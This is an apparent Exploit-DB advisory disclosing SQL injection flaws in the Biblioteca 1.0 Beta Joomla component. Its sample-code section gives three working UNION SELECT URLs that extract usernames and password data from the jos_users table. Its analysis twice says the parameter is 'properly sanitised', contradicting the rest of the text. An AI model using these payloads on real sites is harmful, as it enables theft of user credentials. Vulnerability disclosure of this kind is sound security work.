Joomla! Component Biblioteca 1.0 Beta - Multiple SQL Injections

EDB-ID:

14703

CVE:

N/A




Platform:

PHP

Date:

2010-08-21


Biblioteca 1.0 Beta Joomla Component Multiple SQL Injection Vulnerabilities

 Name              Biblioteca
 Vendor            http://www.cielostellato.info
 Versions Affected 1.0 Beta

 Author            Salvatore Fresta aka Drosophila
 Website           http://www.salvatorefresta.net
 Contact           salvatorefresta [at] gmail [dot] com
 Date              2010-08-21

X. INDEX

 I.    ABOUT THE APPLICATION
 II.   DESCRIPTION
 III.  ANALYSIS
 IV.   SAMPLE CODE
 V.    FIX
 

I. ABOUT THE APPLICATION
________________________

Component  that  allows  the automatic  management  of a
library  in  electronic format. It' can manage books and
their  loans  through   an   attractive  graphical  user
interface simple and usable.


II. DESCRIPTION
_______________

This component doesn't use the common Joomla's functions
to  get  the parameters's value from GET, POST etc.. and
all  of  these  are  not properly sanitised before being
used in SQL queries.


III. ANALYSIS
_____________

Summary:

 A) Multiple Blind SQL Injection
 B) Multiple SQL Injection
 

A) Multiple Blind SQL Injection
_______________________________


The  parameter  testo  passed  to  bi.php (site and admin
frontends)  is  properly sanitised before being used in a
SQL query.This can be exploited to manipulate SQL queries
by injecting arbitrary SQL code.


B) Multiple SQL Injection
_________________________

The  parameter testo  passed  to  stampa.php, pdf.php and 
models/biblioteca.php (when "view" is set to "biblioteca"
) is  properly sanitised before being used in SQL queries.
This  can  be  exploited to  manipulate  SQL  queries  by
injecting arbitrary SQL code.


IV. SAMPLE CODE
_______________

A) Multiple SQL Injection

http://host/path/components/com_biblioteca/views/biblioteca/tmpl/stampa.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23

http://host/path/components/com_biblioteca/views/biblioteca/tmpl/pdf.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23

http://host/path/index.php?option=com_biblioteca&view=biblioteca&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23


V. FIX
______

No fix.